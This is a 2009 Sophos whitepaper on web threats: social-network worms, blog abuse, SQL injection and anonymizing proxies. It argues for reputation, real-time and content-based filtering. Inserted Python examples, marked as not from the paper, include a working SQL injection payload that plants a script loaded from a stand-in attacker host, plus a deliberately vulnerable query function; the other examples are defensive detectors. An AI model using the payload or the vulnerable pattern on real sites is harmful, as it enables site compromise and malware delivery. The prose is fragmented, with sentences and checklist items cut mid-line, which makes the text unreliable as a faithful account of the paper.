With one new infected webpage discovered every 4.5 seconds, there is no longer any such thing as a trusted website. As the internet becomes an increasingly mission-critical tool, new media such as blogs and social networking sites are a necessary part of business. This paper describes today's new web threats, highlights the need for a positive security model to replace yesterday's access-blocking approach, and describes the three pillars of protection organizations need to safeguard their systems and resources.
April 2009
records. This significant security risk can be extremely costly to businesses, with some estimates putting the cost of a data breach at millions, and even billions, of dollars.2 In addition to significant security and financial risks, organizations have to deal with the legal implications of security breaches. Organizations can be held legally liable if their computers are used to view pornography or hate material, or to incite illegal behavior. There are also ramifications if users violate third-party licenses through illegal MP3, film and software downloads. At the same time, uncontrolled web browsing has serious productivity implications: unauthorized surfing can cause network slowdown and staff inefficiency, and it creates further security (and legal) risk if sensitive company or personal data is posted online.
launching pad for mass-distributing malware attacks and spam.6 In August 2008, Facebook admitted that up to 1800 users had had their profiles defaced by an attack that secretly installed a Trojan while displaying an animated graphic of a court jester blowing a raspberry.7 One particularly active threat is Koobface, a family of worms whose rapid evolution demonstrates the wide range of social networks that are vulnerable.8 Initially targeting Facebook and MySpace, Koobface now targets a more diverse set of social networks, including MySpace, Bebo, hi5, GeoCities, Friendster and Tagged.9 The worm spreads by sending your friends on the social network a link to a third-party site that purports to host a video clip. If they are tricked into downloading an executable to watch the video, a message is displayed: "Error installing Codec. Please Contact Support." The malware then accesses Facebook, MySpace, etc. from the newly infected machine to spread itself further.10 The sites to which victims are directed use a script to check which social network referred them. The aim is to serve malware tailored to the networks of which the victim is known to be a member (though to date these links all deliver the same executable).

Blogs, micro-blogs and hackers

Hackers are also targeting other social media such as blogs. In much the same way that they set up malicious pages on fake websites and then use social engineering techniques to lure visitors to them, they are using free blogging services to create infected blogs. Unsuspecting victims then receive emails with links to the blog, from which malicious software is downloaded.
offer support to video bloggers, which tried to download spyware.4
at risk from a scareware attack.5
Recovery from a SQL injection attack can be difficult: there are numerous cases of website owners cleaning up their database only to be hit again a few hours later, because the injectable code that let the attacker in was never fixed.
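As an added illustration (not code from the paper), the following Python script models that re-infection cycle against an in-memory SQLite table. The table contents, the page-rename function and the placeholder host name in the injected tag are all constructed for the example; the payload shape, which turns one row's UPDATE into a table-wide one that appends a script tag to every page body, is the pattern the 2008 mass-injection campaigns used.

```python
import sqlite3

# Constructed sample content for this example; not data from the paper.
PAGES = [(1, "Home", "Welcome"), (2, "About", "Who we are"), (3, "Contact", "Mail us")]

# The host name is a placeholder, not a real malware site.
INJECTED_TAG = '<script src="http://attacker.example/x.js"></script>'

# Payload of the kind seen in the 2008 mass-injection campaigns: it closes the
# title string, appends a script tag to every row's body, and comments out the
# original WHERE clause so the UPDATE hits the whole table.
PAYLOAD = "x', body = body || '" + INJECTED_TAG + "' WHERE 1=1 --"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?, ?)", PAGES)
    conn.commit()
    return conn


def rename_page_vulnerable(conn, page_id, new_title):
    # Deliberately vulnerable: the caller-supplied title is pasted into the SQL text.
    sql = "UPDATE pages SET title = '%s' WHERE id = %d" % (new_title, page_id)
    conn.execute(sql)
    conn.commit()


def rename_page_safe(conn, page_id, new_title):
    # Parameterised: the driver sends the title as a value, never as SQL.
    conn.execute("UPDATE pages SET title = ? WHERE id = ?", (new_title, page_id))
    conn.commit()


def infected_rows(conn):
    """Number of pages whose body carries an injected script tag."""
    return conn.execute(
        "SELECT count(*) FROM pages WHERE body LIKE '%<script%'").fetchone()[0]


def clean_database(conn):
    # The clean-up many site owners performed: strip the tag from every row.
    conn.execute("UPDATE pages SET body = replace(body, ?, '')", (INJECTED_TAG,))
    conn.commit()


def demo():
    """Returns infected-row counts at each stage plus the title stored by the safe path."""
    conn = make_db()
    rename_page_vulnerable(conn, 1, PAYLOAD)
    after_attack = infected_rows(conn)       # every row now carries the tag
    clean_database(conn)
    after_clean = infected_rows(conn)        # database looks clean again
    rename_page_vulnerable(conn, 1, PAYLOAD)
    after_reattack = infected_rows(conn)     # same hole, same result a moment later
    clean_database(conn)
    rename_page_safe(conn, 1, PAYLOAD)
    after_safe = infected_rows(conn)         # payload is stored as an odd title, nothing more
    safe_title = conn.execute("SELECT title FROM pages WHERE id = 1").fetchone()[0]
    return after_attack, after_clean, after_reattack, after_safe, safe_title


if __name__ == "__main__":
    print(demo())
```

The point of the sequence is that clean_database() restores the data without touching the code path that accepted the payload, so the next request repeats the damage; only the parameterised rename closes the hole.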
At the same time, vulnerabilities in popular legitimate blogging platforms, just like those in any other platform, can be, and are, exploited by criminals. Of note is the micro-blogging site Twitter, which has begun to be targeted. In January 2009, Twitter's internal systems were hacked and the accounts of Britney Spears, Fox News and Barack Obama, among others, were broken into.11 Two months later hundreds of Twitter users were hit when messages were sent from compromised accounts trying to drive traffic to a pornographic website.12
Gaming community: the Valve Steam network was targeted by a phish offering add-ons for the new zombie shooter Left 4 Dead.15
PayPal: an unusual type of phishing attack spammed out malware within a RAR attachment.16
Anonymizing proxies bypass URL filtering and create enormous security vulnerabilities.
material or illegal downloads could have serious legal ramifications for an organization, as could the sharing of confidential information over the internet.
their organization's web filter means they could spend all day on, for example, social networking sites rather than working, and consume valuable network bandwidth.
pillar one
Reputation-based filtering
Reputation-based filters are the first critical component in the fight against web-based threats. They prevent access to a catalog of sites known to have hosted malware or other unwanted content by filtering URLs on their reputation as good or bad, and are an established, proven tool for protecting against web-based threats that are already known and located. As well as providing this basic form of preventive protection, they help optimize network performance and staff productivity by blocking access to illegal, inappropriate or non-business-critical web content.

Although traditional URL filters often connect to vast, regularly updated databases of sites known to host malware or suspicious content, they have several significant shortcomings. In particular, they offer no protection against malware hosted on legitimate, previously safe sites that have been hijacked: such a site keeps its good reputation until the database catches up. Neither do they protect against malware on newly created websites that the catalog has not yet seen. Cybercriminals are well aware of, and readily exploit, the fact that traffic from these sites is not blocked and that malware, whether new or old, will be allowed into an organization.

Another significant shortcoming of traditional URL filters is that they often lack an effective answer to the enormous issue of anonymizing proxies. To prevent users from bypassing filtering controls, the following two components are critical in forming a defense against anonymizing proxy use:

a component that seeks out new anonymizing proxies as they are published and updates the filtering database at frequent, regular intervals;
a component that automatically inspects traffic for signs that it is being routed through a proxy, effectively closing the door on private proxies or other proxies not identified through the reputation service.
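To make the two components concrete, here is an added Python example (not the paper's or any vendor's code) that combines a catalog lookup with a traffic heuristic for anonymizing proxies. The catalog, its categories, the block policy and every host name are constructed placeholders. The heuristic is the one most CGI-proxy scripts give away: the request carries another site's URL, either in the path, in a query parameter, or in a parameter after base64 or rot13 encoding, which is how the gateway can catch a private proxy the catalog has never heard of.

```python
import base64
import binascii
import codecs
from urllib.parse import parse_qsl, urlsplit

# Constructed reputation catalog standing in for a vendor's URL database.
# Host names are placeholders, not real sites.
CATALOG = {
    "known-bad.example": "malware",
    "cgiproxy.example": "anonymizer",
    "news.example": "news",
}
# Policy assumed for this example: categories the gateway refuses outright.
BLOCKED_CATEGORIES = {"malware", "anonymizer"}


def lookup_reputation(host):
    """Return the catalogued category for host, matching parent domains too."""
    labels = host.lower().split(".")
    for i in range(len(labels) - 1):          # never match a bare TLD
        category = CATALOG.get(".".join(labels[i:]))
        if category:
            return category
    return "uncategorized"


def looks_like_url(value):
    return value.lower().startswith(("http://", "https://"))


def candidate_decodings(value):
    """Yield the raw value plus the decodings proxy scripts commonly apply to the target URL."""
    yield value
    try:                                       # base64, with any stripped padding restored
        padded = value + "=" * (-len(value) % 4)
        yield base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        pass
    yield codecs.decode(value, "rot13")


def embeds_target_url(url):
    """Heuristic: does this request carry another site's URL, as a CGI proxy request would?"""
    parts = urlsplit(url)
    if looks_like_url(parts.path.lstrip("/")):          # http://proxy/http://target
        return True
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if any(looks_like_url(v) for v in candidate_decodings(value)):
            return True
    return False


def decide(url):
    """(action, reason): catalog verdict first, then the anonymizer heuristic."""
    host = urlsplit(url).hostname or ""
    category = lookup_reputation(host)
    if category in BLOCKED_CATEGORIES:
        return "block", category
    if embeds_target_url(url):
        return "block", "anonymizer-heuristic"
    return "allow", category


if __name__ == "__main__":
    for sample in ("http://news.example/story?id=1",
                   "http://www.known-bad.example/x",
                   "http://unknown-host.example/browse.php?u=aHR0cDovL2ZhY2Vib29rLmNvbS8",
                   "http://unknown-host.example/browse.php?u=uggc://snprobbx.pbz/"):
        print(sample, "->", decide(sample))
```

The catalog answers the first question the paper raises (is this host already known bad?); the heuristic answers the second (is an unknown host behaving like a proxy?). In a real gateway the heuristic would run on the decrypted request, which is why the vendor checklist later in the paper asks whether HTTPS traffic is scanned.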
pillar two
Questions to ask a vendor:
Do you scan all incoming traffic for malware?
Do you use your own technology for malware scanning or rely on third parties?
Is your malware scanning engine signature-based or does it use behavioral analysis?
How frequently is your product updated to
How many new threat-hosting sites are added to your catalog daily?
Is there an additional cost for real-time malware filtering?
Is there a performance impact for real-time malware filtering?
How many anonymizing proxies do you
Does your solution identify anonymizing proxy use in real time?
Do you scan HTTPS-encrypted traffic?
Can you demonstrate real research expertise in web threats?
Can I see a demo of the admin console to
Are there on-board monitors to track software, hardware and traffic health?
How are issues reported to the administrator? Via email? Via phone call?
to assure the system is available 24/7?
pillar three
Content-based filtering
Content-based filtering analyzes all web traffic on the network to determine the true file type of content coming back from a website, and can allow or disallow that traffic based on corporate policy.

Content filters scan the actual content of a file, rather than simply looking at the file extension or the MIME type reported by the web server, and so can identify and block files that masquerade as innocent, allowed file types but really contain unauthorized content. A file might, for example, carry a .TXT extension and be served as text/plain, yet in fact be an executable. By enforcing business-type content only, this pillar of protection lets organizations create policies around the variety of content types that can be used to carry malware, thereby reducing the risk of infection. For example, Windows executables or screensavers might be disallowed. Content-based filtering also improves bandwidth optimization by blocking large or resource-hungry content, such as streaming video.
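As an added example (not code from the paper or from any product), the following Python shows the true-file-type check a content filter performs: it identifies a Windows executable structurally, by following the DOS header's e_lfanew pointer to the PE signature, rather than trusting the extension or the server's Content-Type, and applies an assumed policy that blocks Windows executables, which covers .scr screensavers as well as .exe files. The signature table, the extension and MIME maps, and the 88-byte fake PE stub are constructed for the example.

```python
import struct

# Leading-byte signatures for the formats this example recognises. PE files are
# handled separately in is_pe() because their signature sits at a variable offset.
SIGNATURES = [
    (b"\x7fELF", "elf-executable"),
    (b"PK\x03\x04", "zip"),
    (b"%PDF-", "pdf"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"MZ", "dos-executable"),        # MZ header without a PE signature behind it
]

# What the extension and the server-supplied MIME type each claim (constructed maps).
EXTENSION_TYPES = {"txt": "text", "exe": "windows-executable", "scr": "windows-executable",
                   "dll": "windows-executable", "zip": "zip", "pdf": "pdf", "png": "png"}
MIME_TYPES = {"text/plain": "text", "application/zip": "zip", "application/pdf": "pdf",
              "image/png": "png", "application/x-msdownload": "windows-executable"}

# Policy assumed for this example: Windows executables never come in, whatever they are called.
BLOCKED_TYPES = {"windows-executable"}


def is_pe(data):
    """True if data starts with a DOS header whose e_lfanew field points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def true_filetype(data):
    """Classify a response body by its content, ignoring any name or header it arrived with."""
    if is_pe(data):
        return "windows-executable"
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    head = data[:4096]
    if head and b"\x00" not in head:
        try:
            head.decode("utf-8")
            return "text"
        except UnicodeDecodeError:
            pass
    return "unknown-binary"


def gateway_decision(filename, content_type, data):
    """Compare what the download claims to be with what it is, then apply policy."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed = EXTENSION_TYPES.get(ext) or MIME_TYPES.get(content_type) or "unknown"
    actual = true_filetype(data)
    action = "block" if actual in BLOCKED_TYPES else "allow"
    return {"action": action, "actual": actual, "claimed": claimed,
            "masquerade": claimed != "unknown" and claimed != actual}


def build_fake_pe():
    """Constructed 88-byte stub: a DOS header with e_lfanew = 0x40 followed by the PE signature.
    It is not a runnable program, only enough structure for is_pe() to recognise."""
    header = bytearray(0x40)
    header[0:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20


if __name__ == "__main__":
    for name, mime, body in [
        ("readme.txt", "text/plain", build_fake_pe()),          # executable dressed as text
        ("saver.scr", "application/octet-stream", build_fake_pe()),
        ("notes.txt", "text/plain", b"Nothing to see here.\n"),
        ("photos.zip", "application/zip", b"PK\x03\x04" + b"\x00" * 26),
    ]:
        print(name, gateway_decision(name, mime, body))
```

The masquerade flag is worth logging separately from the block decision: a file whose extension and MIME type both disagree with its contents is a strong signal on its own, even for a type the policy would otherwise allow.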
Users should also be encouraged or required to report unusual behavior, such as their computer suddenly becoming slow, their browser's home page changing without any input from them, or a file they open that appears to do nothing (a common sign of a dropper that has silently installed something else).
Conclusion
Every minute of every day, cybercriminals are looking to exploit web traffic for commercial gain, and since web browsing is integral to most businesses' day-to-day activities, the web gateway must be equipped with a security solution that lets the business and its users be productive while providing the security essential to a risk-free experience. Organizations looking to protect against the growing threat of web-based malware need a solution that above all demonstrates its security attributes and combines powerful site and content controls with low-impact, effective administration. At the same time, end-user expectations and requirements for speed, efficiency, and open access to the tools and sites they need must be met. Solutions that fail to meet these demands for security, control, performance, and accessibility will ultimately fail the organization.
Employees must never open spam emails.
Employees must never click on links included in emails sent from unknown senders.
IT must ensure that the organization's web browsers are patched at all times.
Employees should minimize their non-work-related browsing for both security and productivity reasons.
Sources
1. Sophos security threat report, 2009. secure.sophos.com/sophos/docs/eng/marketing_material/sophos-security-threat-report-jan-2009-na.pdf
2. www.infowatch.com/threats?chapter=162971949&id=207784708
3. www.sophos.com/blogs/gc/g/2008/09/15/hackers-infect-businessweek-website-via-sql-injection-attack
4. www.sophos.com/pressoffice/news/articles/2008/10/adobe-infection.html
5. www.sophos.com/pressoffice/news/articles/2008/07/playstation.html
6. www.sophos.com/blogs/gc/g/2008/09/17/facebook-malware-is-a-real-threat
7. www.sophos.com/blogs/gc/g/2008/08/07/more-malicious-links-seen-on-facebook
8. www.sophos.com/security/analyses/viruses-and-spyware/w32koobfagen.html
9. www.sophos.com/security/blog/2009/02/3215.html
10. www.sophos.com/blogs/gc/g/2008/08/04/facebook-and-myspace-malware
11. www.sophos.com/blogs/gc/g/2009/01/07/celebrity-twitter-accounts-hacked
12. www.sophos.com/blogs/gc/g/2009/03/06/chatwebcamfree-attack-hits-twitter-users
13. www.sophos.com/blogs/gc/g/2009/02/25/gmail-users-hit-viddyho-phishing-chat-attack
14. www.sophos.com/blogs/gc/g/2009/03/04/istockphoto-struck-phishing-attack
15. www.sophos.com/security/blog/2009/02/3426.html
16. www.sophos.com/security/blog/2009/02/3287.html
17. www.sophos.com/security/blog/2009/02/3071.html
Sophos solution
The Sophos Web Appliance, part of Web Security and Control, blocks spyware, viruses, phishing, malware and unwanted applications at the gateway, searches for and blocks anonymizing proxies, and enables comprehensive web access control for safe, productive web browsing. It features a full-spectrum scanning engine that detects threats through a combination of reputation-based filtering, real-time predictive threat filtering, and content-based filtering. Its easy-to-use management console and reporting tools deliver rapid insight into web traffic, threats and user behavior, enabling secure browsing without the complexity of traditional web filters. As a managed appliance, the Sophos Web Appliance features remote heartbeat monitoring and on-demand remote assistance.